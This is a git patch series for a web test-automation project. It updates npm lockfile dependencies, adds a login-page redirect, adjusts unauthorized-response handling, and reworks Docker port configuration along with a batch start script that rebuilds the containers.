"sha512-J3LABycON/VNEu3abOviqGHuB/LOtOQj8SKmfP9anY5GfAVw/SPjwzSjxGjbZXIxbGfqTHtJw58C2Li/WkStmA==", "dev": true, "requires": { "jsesc": "~0.5.0" @@ -27578,6 +28632,8 @@ "dependencies": { "jsesc": { "version": "0.5.0", + "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-0.5.0.tgz", + "integrity": "sha1-597mbjXW/Bb3EP6R1c9p9w8IkR0=", "dev": true } } @@ -27693,13 +28749,6 @@ "signal-exit": "^3.0.2" } }, - "restructure": { - "version": "0.5.4", - "dev": true, - "requires": { - "browserify-optional": "^1.0.0" - } - }, "ret": { "version": "0.1.15", "dev": true @@ -27714,6 +28763,8 @@ }, "rfdc": { "version": "1.3.0", + "resolved": "https://registry.npmjs.org/rfdc/-/rfdc-1.3.0.tgz", + "integrity": "sha512-V2hovdzFbOi77/WajaSMXk2OLm+xNIeQdMMuB7icj7bk6zi2F8GGAxigcnDFpJHbNyNcgyJDiP+8nOrY5cZGrA==", "dev": true }, "rimraf": { @@ -27796,11 +28847,13 @@ } }, "scope-analyzer": { - "version": "2.1.1", + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/scope-analyzer/-/scope-analyzer-2.1.2.tgz", + "integrity": "sha512-5cfCmsTYV/wPaRIItNxatw02ua/MThdIUNnUOCYp+3LSEJvnG804ANw2VLaavNILIfWXF1D1G2KNANkBBvInwQ==", "dev": true, "requires": { "array-from": "^2.1.1", - "dash-ast": "^1.0.0", + "dash-ast": "^2.0.1", "es6-map": "^0.1.5", "es6-set": "^0.1.5", "es6-symbol": "^3.1.1", @@ -27846,7 +28899,9 @@ } }, "selfsigned": { - "version": "1.10.11", + "version": "1.10.14", + "resolved": "https://registry.npmjs.org/selfsigned/-/selfsigned-1.10.14.tgz", + "integrity": "sha512-lkjaiAye+wBZDCBsu5BGi0XiLRxeUlsGod5ZP924CRSEoGuZAw/f7y9RKu28rwTfiHVhdavhB0qH0INV6P1lEA==", "dev": true, "requires": { "node-forge": "^0.10.0" @@ -27975,6 +29030,8 @@ }, "shallow-copy": { "version": "0.0.1", + "resolved": "https://registry.npmjs.org/shallow-copy/-/shallow-copy-0.0.1.tgz", + "integrity": "sha1-QV9CcC1z2BAzApLMXuhurhoRoXA=", "dev": true }, "shebang-command": { @@ -27995,12 +29052,6 @@ "call-bind": "^1.0.0", "get-intrinsic": "^1.0.2", "object-inspect": "^1.9.0" - }, - "dependencies": { - "object-inspect": { - "version": "1.11.0", - "dev": true - } } }, "signal-exit": { @@ -28144,22 +29195,23 @@ } }, "socket.io": { - "version": "3.1.2", + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/socket.io/-/socket.io-4.4.1.tgz", + "integrity": "sha512-s04vrBswdQBUmuWJuuNTmXUVJhP0cVky8bBDhdkf8y0Ptsu7fKU2LuLbts9g+pdmAdyMMn8F/9Mf1/wbtUN0fg==", "dev": true, "requires": { - "@types/cookie": "^0.4.0", - "@types/cors": "^2.8.8", - "@types/node": ">=10.0.0", "accepts": "~1.3.4", "base64id": "~2.0.0", - "debug": "~4.3.1", - "engine.io": "~4.1.0", - "socket.io-adapter": "~2.1.0", - "socket.io-parser": "~4.0.3" + "debug": "~4.3.2", + "engine.io": "~6.1.0", + "socket.io-adapter": "~2.3.3", + "socket.io-parser": "~4.0.4" }, "dependencies": { "debug": { - "version": "4.3.2", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "requires": { "ms": "2.1.2" @@ -28167,16 +29219,22 @@ }, "ms": { "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", "dev": true } } }, "socket.io-adapter": { - "version": "2.1.0", + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/socket.io-adapter/-/socket.io-adapter-2.3.3.tgz", + "integrity": "sha512-Qd/iwn3VskrpNO60BeRyCyr8ZWw9CPZyitW4AQwmRZ8zCiyDiL+znRnWX6tDHXnWn1sJrM1+b6Mn6wEDJJ4aYQ==", "dev": true }, "socket.io-parser": { "version": "4.0.4", + "resolved": "https://registry.npmjs.org/socket.io-parser/-/socket.io-parser-4.0.4.tgz", + "integrity": "sha512-t+b0SS+IxG7Rxzda2EVvyBZbvFPBCjJoyHuE0P//7OAsN23GItzDRdWa6ALxZI/8R5ygK7jAR6t028/z+7295g==", "dev": true, "requires": { "@types/component-emitter": "^1.2.10", @@ -28185,7 +29243,9 @@ }, "dependencies": { "debug": { - "version": "4.3.2", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "requires": { "ms": "2.1.2" @@ -28193,6 +29253,8 @@ }, "ms": { "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", "dev": true } } @@ -28391,6 +29453,8 @@ }, "split": { "version": "1.0.1", + "resolved": "https://registry.npmjs.org/split/-/split-1.0.1.tgz", + "integrity": "sha512-mTyOoPbrivtXnwnIxZRFYRrPNtEFKlpB2fvjSnCQUiAA6qAZzqwna5envK4uk6OIeP17CsdF3rSBGYVBsU0Tkg==", "dev": true, "requires": { "through": "2" @@ -28434,9 +29498,33 @@ }, "static-eval": { "version": "2.1.0", + "resolved": "https://registry.npmjs.org/static-eval/-/static-eval-2.1.0.tgz", + "integrity": "sha512-agtxZ/kWSsCkI5E4QifRwsaPs0P0JmZV6dkLz6ILYfFYQGn+5plctanRN+IC8dJRiFkyXHrwEE3W9Wmx67uDbw==", "dev": true, "requires": { "escodegen": "^1.11.1" + }, + "dependencies": { + "escodegen": { + "version": "1.14.3", + "resolved": "https://registry.npmjs.org/escodegen/-/escodegen-1.14.3.tgz", + "integrity": "sha512-qFcX0XJkdg+PB3xjZZG/wKSuT1PnQWx57+TVSjIMmILd2yC/6ByYElPwJnslDsuWuSAp4AwJGumarAAmJch5Kw==", + "dev": true, + "requires": { + "esprima": "^4.0.1", + "estraverse": "^4.2.0", + "esutils": "^2.0.2", + "optionator": "^0.8.1", + "source-map": "~0.6.1" + } + }, + "source-map": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", + "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", + "dev": true, + "optional": true + } } }, "static-extend": { @@ -28503,6 +29591,8 @@ }, "static-module": { "version": "3.0.4", + "resolved": "https://registry.npmjs.org/static-module/-/static-module-3.0.4.tgz", + "integrity": "sha512-gb0v0rrgpBkifXCa3yZXxqVmXDVE+ETXj6YlC/jt5VzOnGXR2C15+++eXuMDUYsePnbhf+lwW0pE1UXyOLtGCw==", "dev": true, "requires": { "acorn-node": "^1.3.0", @@ -28521,8 +29611,23 @@ "through2": "~2.0.3" }, "dependencies": { + "escodegen": { + "version": "1.14.3", + "resolved": "https://registry.npmjs.org/escodegen/-/escodegen-1.14.3.tgz", + "integrity": "sha512-qFcX0XJkdg+PB3xjZZG/wKSuT1PnQWx57+TVSjIMmILd2yC/6ByYElPwJnslDsuWuSAp4AwJGumarAAmJch5Kw==", + "dev": true, + "requires": { + "esprima": "^4.0.1", + "estraverse": "^4.2.0", + "esutils": "^2.0.2", + "optionator": "^0.8.1", + "source-map": "~0.6.1" + } + }, "magic-string": { "version": "0.25.1", + "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.25.1.tgz", + "integrity": "sha512-sCuTz6pYom8Rlt4ISPFn6wuFodbKMIHUMv4Qko9P17dpxb7s52KJTmRuZZqHdGmLCK9AOcDare039nRIcfdkEg==", "dev": true, "requires": { "sourcemap-codec": "^1.4.1" @@ -28530,14 +29635,27 @@ }, "merge-source-map": { "version": "1.0.4", + "resolved": "https://registry.npmjs.org/merge-source-map/-/merge-source-map-1.0.4.tgz", + "integrity": "sha1-pd5GU42uhNQRTMXqArR3KmNGcB8=", "dev": true, "requires": { "source-map": "^0.5.6" + }, + "dependencies": { + "source-map": { + "version": "0.5.7", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", + "integrity": "sha1-igOdLRAh0i0eoUyA2OpGi6LvP8w=", + "dev": true + } } }, "source-map": { - "version": "0.5.7", - "dev": true + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", + "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", + "dev": true, + "optional": true } } }, @@ -28546,6 +29664,8 @@ }, "stream-combiner": { "version": "0.2.2", + "resolved": "https://registry.npmjs.org/stream-combiner/-/stream-combiner-0.2.2.tgz", + "integrity": "sha1-rsjLrBd7Vrb0+kec7YwZEs7lKFg=", "dev": true, "requires": { "duplexer": "~0.1.1", @@ -28553,36 +29673,29 @@ } }, "streamroller": { - "version": "2.2.4", + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/streamroller/-/streamroller-3.0.2.tgz", + "integrity": "sha512-ur6y5S5dopOaRXBuRIZ1u6GC5bcEXHRZKgfBjfCglMhmIf+roVCECjvkEYzNQOXIN2/JPnkMPW/8B3CZoKaEPA==", "dev": true, "requires": { - "date-format": "^2.1.0", + "date-format": "^4.0.3", "debug": "^4.1.1", - "fs-extra": "^8.1.0" + "fs-extra": "^10.0.0" }, "dependencies": { - "date-format": { - "version": "2.1.0", - "dev": true - }, "debug": { - "version": "4.3.2", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "requires": { "ms": "2.1.2" } }, - "fs-extra": { - "version": "8.1.0", - "dev": true, - "requires": { - "graceful-fs": "^4.2.0", - "jsonfile": "^4.0.0", - "universalify": "^0.1.0" - } - }, "ms": { "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", "dev": true } } @@ -28690,13 +29803,6 @@ "has-flag": "^3.0.0" } }, - "svg-to-pdfkit": { - "version": "0.1.8", - "dev": true, - "requires": { - "pdfkit": ">=0.8.1" - } - }, "svgo": { "version": "2.7.0", "dev": true, @@ -28795,6 +29901,8 @@ }, "through2": { "version": "2.0.5", + "resolved": "https://registry.npmjs.org/through2/-/through2-2.0.5.tgz", + "integrity": "sha512-/mrRod8xqpA+IHSLyGCQ2s8SPHiCDEeQJSep1jqLYeEUClOFG2Qsh+4FU6G9VeqpZnGW/Su8LQGc4YKni5rYSQ==", "dev": true, "requires": { "readable-stream": "~2.3.6", @@ -28815,6 +29923,8 @@ }, "tiny-inflate": { "version": "1.0.3", + "resolved": "https://registry.npmjs.org/tiny-inflate/-/tiny-inflate-1.0.3.tgz", + "integrity": "sha512-pkY1fj1cKHb2seWDy0B16HeWyczlJA9/WW3u3c4z/NiWDsO3DOU5D7nhTLE9CF0yXv/QZFY7sEJmj24dK+Rrqw==", "dev": true }, "tmp": { @@ -28878,11 +29988,13 @@ "dev": true }, "ts-morph": { - "version": "11.0.3", + "version": "13.0.3", + "resolved": "https://registry.npmjs.org/ts-morph/-/ts-morph-13.0.3.tgz", + "integrity": "sha512-pSOfUMx8Ld/WUreoSzvMFQG5i9uEiWIsBYjpU9+TTASOeUa89j5HykomeqVULm1oqWtBdleI3KEFRLrlA3zGIw==", "dev": true, "requires": { - "@ts-morph/common": "~0.10.1", - "code-block-writer": "^10.1.1" + "@ts-morph/common": "~0.12.3", + "code-block-writer": "^11.0.0" } }, "tslib": { @@ -28937,10 +30049,14 @@ }, "type": { "version": "1.2.0", + "resolved": "https://registry.npmjs.org/type/-/type-1.2.0.tgz", + "integrity": "sha512-+5nt5AAniqsCnu2cEQQdpzCAh33kVx8n0VoFidKpB1dVVLAN/F+bgVOqOJqOnEnrhp222clB5p3vUlD+1QAnfg==", "dev": true }, "type-check": { "version": "0.3.2", + "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.3.2.tgz", + "integrity": "sha1-WITKtRLPHTVeP7eE8wgEsrUg23I=", "dev": true, "requires": { "prelude-ls": "~1.1.2" @@ -28959,13 +30075,17 @@ }, "typedarray": { "version": "0.0.6", + "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", + "integrity": "sha1-hnrHTjhkGHsdPUfZlqeOxciDB3c=", "dev": true }, "typescript": { "version": "4.3.5" }, "ua-parser-js": { - "version": "0.7.28", + "version": "0.7.31", + "resolved": "https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-0.7.31.tgz", + "integrity": "sha512-qLK/Xe9E2uzmYI3qLeOmI0tEOt+TBBQyUIAh4aAgU05FVYzeZrKUdkAZfBNVGRaHVgV0TDkdEngJSw/SyQchkQ==", "dev": true }, "uglify-js": { @@ -28995,23 +30115,31 @@ } }, "unicode-canonical-property-names-ecmascript": { - "version": "1.0.4", + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-canonical-property-names-ecmascript/-/unicode-canonical-property-names-ecmascript-2.0.0.tgz", + "integrity": "sha512-yY5PpDlfVIU5+y/BSCxAJRBIS1Zc2dDG3Ujq+sR0U+JjUevW2JhocOF+soROYDSaAezOzOKuyyixhD6mBknSmQ==", "dev": true }, "unicode-match-property-ecmascript": { - "version": "1.0.4", + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-match-property-ecmascript/-/unicode-match-property-ecmascript-2.0.0.tgz", + "integrity": "sha512-5kaZCrbp5mmbz5ulBkDkbY0SsPOjKqVS35VpL9ulMPfSl0J0Xsm+9Evphv9CoIZFwre7aJoa94AY6seMKGVN5Q==", "dev": true, "requires": { - "unicode-canonical-property-names-ecmascript": "^1.0.4", - "unicode-property-aliases-ecmascript": "^1.0.4" + "unicode-canonical-property-names-ecmascript": "^2.0.0", + "unicode-property-aliases-ecmascript": "^2.0.0" } }, "unicode-match-property-value-ecmascript": { - "version": "1.2.0", + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-match-property-value-ecmascript/-/unicode-match-property-value-ecmascript-2.0.0.tgz", + "integrity": "sha512-7Yhkc0Ye+t4PNYzOGKedDhXbYIBe1XEQYQxOPyhcXNMJ0WCABqqj6ckydd6pWRZTHV4GuCPKdBAUiMc60tsKVw==", "dev": true }, "unicode-properties": { "version": "1.3.1", + "resolved": "https://registry.npmjs.org/unicode-properties/-/unicode-properties-1.3.1.tgz", + "integrity": "sha512-nIV3Tf3LcUEZttY/2g4ZJtGXhWwSkuLL+rCu0DIAMbjyVPj+8j5gNVz4T/sVbnQybIsd5SFGkPKg/756OY6jlA==", "dev": true, "requires": { "base64-js": "^1.3.0", @@ -29019,11 +30147,15 @@ } }, "unicode-property-aliases-ecmascript": { - "version": "1.1.0", + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-property-aliases-ecmascript/-/unicode-property-aliases-ecmascript-2.0.0.tgz", + "integrity": "sha512-5Zfuy9q/DFr4tfO7ZPeVXb1aPoeQSdeFMLpYuFebehDAhbuevLs5yxSZmIFN1tP5F9Wl4IpJrYojg85/zgyZHQ==", "dev": true }, "unicode-trie": { "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-trie/-/unicode-trie-2.0.0.tgz", + "integrity": "sha512-x7bc76x0bm4prf1VLg79uhAzKw8DVboClSN5VxJuQ+LKDOVEW9CdH+VY7SP+vX7xCYQqzzgQpFqz15zeLvAtZQ==", "dev": true, "requires": { "pako": "^0.2.5", @@ -29032,6 +30164,8 @@ "dependencies": { "pako": { "version": "0.2.9", + "resolved": "https://registry.npmjs.org/pako/-/pako-0.2.9.tgz", + "integrity": "sha1-8/dSL073gjSNqBYbrZ7P1Rv4OnU=", "dev": true } } @@ -29075,11 +30209,15 @@ } }, "universalify": { - "version": "0.1.2", + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/universalify/-/universalify-2.0.0.tgz", + "integrity": "sha512-hAZsKq7Yy11Zu1DE0OzWjw7nnLZmJZYTDZZyEFHZdUhV8FkH5MCfoU1XMaxXovpyW5nq5scPqq0ZDP9Zyl04oQ==", "dev": true }, "unix-crypt-td-js": { "version": "1.1.4", + "resolved": "https://registry.npmjs.org/unix-crypt-td-js/-/unix-crypt-td-js-1.1.4.tgz", + "integrity": "sha512-8rMeVYWSIyccIJscb9NdCfZKSRBKYTeVnwmiRYT2ulE3qd1RaDQ0xQDP+rI3ccIWbhu/zuo5cgN8z73belNZgw==", "dev": true }, "unpipe": { @@ -29146,7 +30284,9 @@ } }, "url-parse": { - "version": "1.5.3", + "version": "1.5.9", + "resolved": "https://registry.npmjs.org/url-parse/-/url-parse-1.5.9.tgz", + "integrity": "sha512-HpOvhKBvre8wYez+QhHcYiVvVmeF6DVnuSOOPhe3cTum3BnqHhvKaZm8FU5yTiOu/Jut2ZpB2rA/SbBA1JIGlQ==", "dev": true, "requires": { "querystringify": "^2.1.1", @@ -29794,6 +30934,8 @@ }, "word-wrap": { "version": "1.2.3", + "resolved": "https://registry.npmjs.org/word-wrap/-/word-wrap-1.2.3.tgz", + "integrity": "sha512-Hz/mrNwitNRh/HUAtM/VT/5VH+ygD6DV7mYKZAtHOrbs8U7lvPS6xf7EJKMF0uW1KJCl0H701g3ZGus+muE5vQ==", "dev": true }, "wordwrap": { @@ -29858,6 +31000,8 @@ }, "xmldoc": { "version": "1.1.2", + "resolved": "https://registry.npmjs.org/xmldoc/-/xmldoc-1.1.2.tgz", + "integrity": "sha512-ruPC/fyPNck2BD1dpz0AZZyrEwMOrWTO5lDdIXS91rs3wtm4j+T8Rp2o+zoOYkkAxJTZRPOSnOGei1egoRmKMQ==", "dev": true, "requires": { "sax": "^1.2.1" @@ -29865,6 +31009,8 @@ }, "xtend": { "version": "4.0.2", + "resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz", + "integrity": "sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ==", "dev": true }, "y18n": { From 586041d107da05eb05149cb49f4fadd1bb1c2472 Mon Sep 17 00:00:00 2001 From: NessArt Date: Tue, 13 Sep 2022 10:27:08 +0200 Subject: [PATCH 06/50] redirect logged in user from /login --- frontend/src/app/login/login.component.ts | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/frontend/src/app/login/login.component.ts b/frontend/src/app/login/login.component.ts index 750dc198e..d0e0b474b 100644 --- a/frontend/src/app/login/login.component.ts +++ b/frontend/src/app/login/login.component.ts @@ -123,6 +123,14 @@ export class LoginComponent implements OnInit, AfterViewInit { this.themeObservable = this.themeService.themeChanged.subscribe((_) => { this.isDark = this.themeService.isDarkMode(); }); + if((!!localStorage.getItem('login'))==true){ + if(localStorage.getItem('repository')){ + this.router.navigate(['/']) + } + else{ + this.getRepositories() + } + } } ngOnDestroy() { From 8b8b420984b16d23b1cce6b94011c77ae0ceded0 Mon Sep 17 00:00:00 2001 From: NessArt Date: Tue, 13 Sep 2022 11:22:34 +0200 Subject: [PATCH 07/50] fix redirect bug --- frontend/src/app/Services/http-logger.interceptor.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/frontend/src/app/Services/http-logger.interceptor.ts b/frontend/src/app/Services/http-logger.interceptor.ts index 74c9eea5b..25a4f6199 100644 --- a/frontend/src/app/Services/http-logger.interceptor.ts +++ b/frontend/src/app/Services/http-logger.interceptor.ts @@ -23,7 +23,7 @@ export class HttpLoggerInterceptor implements HttpInterceptor { catchError((err: HttpErrorResponse)=>{ if(err.status == HttpStatusCode.Unauthorized){ if(window.location.pathname != '/login')window.location.href = '/login' - window.localStorage.setItem("login", 'false')} + window.localStorage.removeItem('login')} console.error(err); return throwError(()=> err) }) From 3d854c4f200b6dc66865c0302dc74acad380a914 Mon Sep 17 00:00:00 2001 From: "Kuhwald, Max" Date: Tue, 13 Sep 2022 11:33:49 +0200 Subject: [PATCH 08/50] reading ports from env, fixed cache problem --- backend/Dockerfile | 4 ++-- docker-compose.yml | 8 ++------ frontend/Dockerfile | 3 +-- runDocker.cmd | 3 --- 4 files changed, 5 insertions(+), 13 deletions(-) delete mode 100644 runDocker.cmd diff --git a/backend/Dockerfile b/backend/Dockerfile index c20c086d4..cb9296caf 100644 --- a/backend/Dockerfile +++ b/backend/Dockerfile @@ -36,7 +36,7 @@ RUN curl https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > mic RUN install -o root -g root -m 644 microsoft.gpg /etc/apt/trusted.gpg.d/ RUN sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/edge stable main" > /etc/apt/sources.list.d/microsoft-edge-dev.list' RUN rm microsoft.gpg -RUN apt update && yes | apt install microsoft-edge-stable +RUN apt update && yes | apt install microsoft-edge-stable # install msedgedriver # get the latest stable version number and remove two FF FE Bytes at start and OD Byte at end (DataStreamBytes) @@ -53,7 +53,7 @@ RUN rm -f latest_stable.txt # Bundle app source COPY . . -EXPOSE ${PORT} +EXPOSE 8080 # Start dbus-daemon for google-chrome RUN service dbus start diff --git a/docker-compose.yml b/docker-compose.yml index 3f9e1b510..0d9ea67ab 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -4,19 +4,15 @@ services: backend: build: ./backend - env_file: - - ./backend/.env ports: - - "8080:8080" + - "${BACKENDPORT}:8080" container_name: "Seed-backend" frontend: build: ./frontend - env_file: - - ./frontend/.env ports: - - "4200:4200" + - "${FRONTENDPORT}:4200" container_name: "Seed-frontend" depends_on: - backend diff --git a/frontend/Dockerfile b/frontend/Dockerfile index 709b45980..28396119c 100644 --- a/frontend/Dockerfile +++ b/frontend/Dockerfile @@ -15,8 +15,7 @@ RUN npm install --force # Bundle app source COPY . . -#EXPOSE 4200 -EXPOSE ${PORT} +EXPOSE 4200 # Aus frontend/package.json CMD ["node", "server.js"] diff --git a/runDocker.cmd b/runDocker.cmd deleted file mode 100644 index ae011090b..000000000 --- a/runDocker.cmd +++ /dev/null @@ -1,3 +0,0 @@ -:: run docker compose (ctrl+c to cancle) -docker-compose build -docker-compose up \ No newline at end of file From bad95eadddbbf5dba4dc055834b20db34843fbb6 Mon Sep 17 00:00:00 2001 From: "Kuhwald, Max" Date: Tue, 13 Sep 2022 12:04:58 +0200 Subject: [PATCH 09/50] change gitignore to include docker start skript --- .gitignore | 1 + runDocker.bat | 22 ++++++++++++++++++++++ 2 files changed, 23 insertions(+) create mode 100644 runDocker.bat diff --git a/.gitignore b/.gitignore index 2a7955ca2..7c5e807e5 100644 --- a/.gitignore +++ b/.gitignore @@ -81,6 +81,7 @@ backend/features/reporting_html*.html *.bat *.sh *.ps1 +!runDocker.bat # local testing for step-definition development backend/features/step_definitions/testing.js diff --git a/runDocker.bat b/runDocker.bat new file mode 100644 index 000000000..6923eed17 --- /dev/null +++ b/runDocker.bat @@ -0,0 +1,22 @@ +#!/bin/bash + +del .env +@echo off +for /f "tokens=*" %%s in (./backend/.env) do ( + set %%s +) + +echo BACKENDPORT=%PORT%>.env + +@echo off +for /f "tokens=*" %%s in (./frontend/.env) do ( + set %%s +) + +echo FRONTENDPORT=%PORT%>>.env + +docker compose down +docker rmi seed-test_backend +docker rmi seed-test_frontend +echo Y | docker system prune -a +docker-compose up --build From ff08d4f0293c58f05f8c037b131be39da9b2abd5 Mon Sep 17 00:00:00 2001 From: Alice-cla Date: Thu, 15 Sep 2022 18:55:14 +0200 Subject: [PATCH 10/50] input text centering --- .../app/base-editor/base-editor.component.css | 741 +++++++++--------- 1 file changed, 373 insertions(+), 368 deletions(-) diff --git a/frontend/src/app/base-editor/base-editor.component.css b/frontend/src/app/base-editor/base-editor.component.css index 0d4c0db4c..79eaf44d1 100644 --- a/frontend/src/app/base-editor/base-editor.component.css +++ b/frontend/src/app/base-editor/base-editor.component.css @@ -1,368 +1,373 @@ -:host ::ng-deep .stepsListContainer{ - display: flex; - justify-content: space-between; -} - -:host ::ng-deep .stepsListContainer em{ - color: var(--ocean-blue); -} - -:host ::ng-deep .stepsListContainer .disabled em{ - color: gray !important; -} - - -:host ::ng-deep .stepsListContainer button{ - border: none; - background: none; -} - -:host ::ng-deep .checkbox{ - margin-right: 5px; - margin-bottom: 5px; - margin-left: 3px; - margin-top: 5px -} - -:host ::ng-deep .checkbox:hover{ - cursor: pointer; -} - -:host ::ng-deep #checkbox_all_example{ - margin-left: 10px; -} - -:host ::ng-deep #checkbox_all{ - margin-top: 2px; - margin-bottom: 2px; - margin-left: 6px; -} - -.select-item-drag-preview { - background-color: rgba(204, 0, 102, 0); - font-weight: bold; - border: 2px solid #666; - border-radius: 50%; - display: inline-block; - width: 30px; - line-height: 30px; -text-align: center; -} - -input[type=checkbox] { - height: 13px; -} - -.stepsContainer { - white-space: nowrap; - overflow: hidden; - width: 100%; -} - -.stepLine { - box-sizing: border-box; - width: fit-content; - max-width: inherit; - padding: 1px 20px 1px 20px; -} - -.cdk-drop-list-dragging .cdk-drag { - transition: transform 250ms cubic-bezier(0, 0, 0.2, 1); -} - -.dragIconContainer{ - text-align: center; - cursor: move; -} - -em.dragIcon{ - font-size: 18px; - color: black; - background-color: var(--white); - margin-top:1px; -} - -.text-inline{ - display: flex; -} - -.text-inline > button{ - margin: 0 5px; -} - -.text-inline > p > input{ - margin: 0 5px; -} - -.uk-card-title { - font-size: medium; - font-weight: bold; -} - -.pencil_icon { - padding-left: 12px; -} - -:host ::ng-deep .disabled { - color: gray !important; - /* background: var(--white) !important; */ - font-style: italic; - text-decoration: line-through; -} - -:host ::ng-deep .darkTheme .disabled { - color: var(--buttonDisabled) !important; -} - -.checkboxDropdown{ - margin-top: -15px !important; -} - -input[type="text"]{ - margin: 1px; - padding: 1px; - border: none; - border-bottom: 1px solid #333; - position: relative; - top: -2px; - width: auto; - min-width: 5px; -} - -.scenarioBarContainer{ - display: flex; - justify-content: space-between; - border-bottom: 1px solid #e5e5e5; - background-color: #f8f8f8; - margin: 0px 20px; -} - -.scenarioBarContainer button, -.exampleBarContainer button{ - border: none; - background: none; - transform: translate(0px, -3px); - height: 24px; - border-radius: 10%; -} - -.scenarioBarContainer > div, -.exampleBarContainer{ - margin-top: 5px; - margin-bottom: 5px; - padding: 10px 15px; - display: flex; - height: 40px; -} - -/* :host ::ng-deep .scenarioTitle{ - background: transparent; - border: none; - margin-right: 2px; -} */ - -/* .scenarioTitle { - background: transparent; -} */ - -/* :host ::ng-deep .scenarioTitle > em { - color: var(--ocean-blue); - font-size: 24px; - transform: translate(0px, 3px) -} */ - -:host ::ng-deep .scenarioTitle{ - /* background: var(--white); */ - background: transparent; - border: none; - margin-right: 2px; -} - -/* :host ::ng-deep .darkTheme, .scenarioTitle { - background: transparent; -} */ - - -:host ::ng-deep .scenarioTitle > em{ - color: var(--ocean-blue); - font-size: 24px; - transform: translate(0px, 3px) -} - -/*#inputExample{ - background: #f8f8f8; - border-radius: 50%; - height: 24px; - width: 24px; -} -#inputExampleIcon{ - margin-top: -2px; - margin-left: -3px; -}*/ - -.exampleBarContainer{ - border-bottom: 1px solid #e5e5e5; - background-color: #f8f8f8; - display: flex; -} - -.scenarioButton { - margin-right: 10px; -} - -.actionBarButtonGroup{ - margin-left: 3px; -} - -.actionButton{ - margin-left: 10px; -} - -.actionButton > em{ - color: #333; - font-size: 22px; -} - -.darkTheme .actionButton > em { - color:#000000; -} - -.scenarioButton em{ - color: var(--ocean-blue); -} - -.darkTheme.scenarioButton em{ - color: var(--ocean-blue); -} - -.scenarioButton em:active { - background-color: var(--ocean-blue); - color: var(--white); -} - -:host ::ng-deep .disabled input{ - color: gray; - border-bottom: 1px solid gray; -} - -:host ::ng-deep .darkTheme .disabled input { - color: var(--buttonDisabled) !important; - border-color: var(--border); -} - -.uk-dropdown{ - padding: 15px; -} - -/* .darkTheme .uk-dropdown { - background-color: #60767b; -} */ - -.padding{ - padding-top: 20px; - padding-left: 20px; - padding-bottom: 20px; - padding-right: 20px; -} - -/* Eventually not in use */ -.mat-form-field + .mat-form-field { - margin-left: 8px; -} - -:host ::ng-deep .scenarioBarContainer .disabled em{ - color: gray !important; - /* background: #f8f8f8 !important; */ -} - -:host ::ng-deep .darkTheme .scenarioBarContainer .disabled em { - color: var(--buttonDisabled) !important; -} - -.exampleList{ - min-width: 100px; -} - -.exampleList ::ng-deep .mat-form-field-wrapper{ - padding-bottom: 0px !important; -} - -.exampleList ::ng-deep .mat-form-field-underline{ - bottom: 0px !important; -} - -.exampleList ::ng-deep .mat-select-value{ - color: var(--ocean-blue) !important; - font-weight: bold !important; - max-width: max-content !important; -} -.exampleListOption { - 